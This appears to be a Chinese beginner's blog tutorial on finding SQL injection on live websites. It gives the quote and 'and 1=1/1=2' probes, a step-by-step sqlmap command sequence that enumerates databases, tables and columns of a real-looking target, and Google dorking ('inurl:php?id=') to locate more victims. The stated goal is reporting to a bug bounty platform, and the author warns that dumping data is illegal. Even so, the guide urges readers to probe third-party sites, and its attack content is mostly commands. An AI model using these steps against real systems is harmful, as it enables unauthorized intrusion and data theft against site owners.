前言:
学了sql注入咋找漏洞呢?只会靶场的sql注入咋办呢?实战的sqlmap就是显示参数不可注入跑不出来,这sql注入到底还存不存在网络上呢?还是我的sqlmap不会用呢?
这些一定是入门的小白对sql注入的一些疑问吧,这篇文章,先展示sql注入的发现,然后是sqlmap的实战使用,最后再讲讲一些我目前的经验,绝对能让小白脱离sql注入靶场,从而投入实战中
1、发现过程
直接一个单引号插后边,看到没,报错了
为了进一步验证,然后加熟悉的and 1=1 ,and 1=2,前者插入正常,后者异常
2、然后还用问吗?直接丢sqlmap跑,先采用最原始的命令验证sql注入的存在,跑出来了,就获取库,表,字段吧
(1)python sqlmap.py -u".......php?id=356"? ? ? ? ? ? ? ? 验证sql注入
(2)python sqlmap.py -u".......php?id=356" -dbms mysql -dbs? ? ? ? ?获取库
(3)python sqlmap.py -u"......php?id=356" -dbms mysql -D 库名?-tables? ? ? ? ?获取表
?
(4)python sqlmap.py -u"......php?id=356" -dbms mysql -D 库名 -T 表名 -columns,到获取字段这一步即可,不要查看字段下的数据,否则就是违法
?3、最后就交补天了,资产为几百万的小公司而已,这个sql注入可导致他的所有数据泄露,包括数据库连接用户名密码
4、经验总结
(1)小白把一些常规的web靶场如pikachu,dvwa,xss-labs,sql-labs练过后(个人没练完,只是针对性挑着练,怎么针对法,可以评论区问我),就找实战,用上特定搜索法,比如inurl:php?id=31等找sql注入等,这种搜索技巧其他文章有,找找就行,我这里就不啰嗦了,然后你按我上述流程,二十来个找一个还是行的
(2)关于sqlmap的用法,我把我自己整理的方法放出来
(链接:https://pan.baidu.com/s/1ixFaEMhSKA21algws2MXZA?提取码:6666?
--来自百度网盘超级会员V1的分享)
先拿sqlmap对着靶场把常用指令和sqlmap注入流程熟悉一下,再拿去实战,不然实战中的sqlmap使用的会让你怀疑人生,一堆红色警告,然后跑大半天了还告诉你参数不可注入
(3)关于有什么学习路上的疑问,可评论区留下,我会回答